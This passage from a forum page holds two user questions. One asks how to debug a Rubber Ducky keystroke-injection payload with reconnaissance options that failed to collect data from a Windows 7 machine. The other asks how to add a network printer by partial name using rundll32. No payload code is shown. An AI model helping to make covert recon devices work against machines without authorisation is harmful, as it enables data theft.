  24. Hi all, So I placed the following scipt on my Rubber Ducky, as inject.bin (next post). I used the Payload Generator located here. I chose all Recon apart from Screen Capture, and Reporting as 'Save Files to USB' Drive. I plugged it in to a Windows 7 machine, with the machine being on the Desktop and not locked. It proceeded to do nothing for a while, then it opened a random image file I happened to have on my Desktop and zoomed in and out on it a few times. Then silence. I plugged in my USB, named 'HELLOWORLD', gave it a few minutes and then unplugged. The USB had nothing on it, which wasn't right. It failed to gather any information at all. Is there a way I can debug the script? As in, get it to tell me exactly what it's doing, as it does it, on-screen? Or maybe you have an idea of what went wrong? *NOTE* This bit at the start... STRING powershell Start-Process notepad -Verb runAs ... didn't open notepad. Notepad failed to open at any point. Cheers.
  25. Hello all, Sorry to ask another CMD/Batch question, I'm still learning and having way too much fun ;) I'm trying to add a printer using... rundll32.exe printui.dll,PrintUIEntry /in /n "\\servername\Printer Name" ... which works great IF you know the full name of the printer you are trying to add. If I use Windows 7's Control Panel > Devices & Printers to add a printer, I can select; Add A Printer > Add A Network Printer > The Printer I Want Isn't Listed > Find a printer in the directory and then type in a small section of the printer's name and it will find it. For example, one of our printers is called 'Q123 HP LJ MFP M880 on SERVERNAME' but I can find it by simply typing in Q123. Is there a way that I can get the batch command to add the printer using something like... rundll32.exe printui.dll,PrintUIEntry /in /n "Q123" ... and get the system to do the same kind of search it would do if I went through the control panel (automatically search our print server for a name like 'Q123' and install it?) I have trawled the internet for a while looking for this info, but was unsuccessful in finding anything that didn't state to input the full name of the printer. Thank you in advance. *edit* Amended grammar/spelling.
×
×
  • Create New...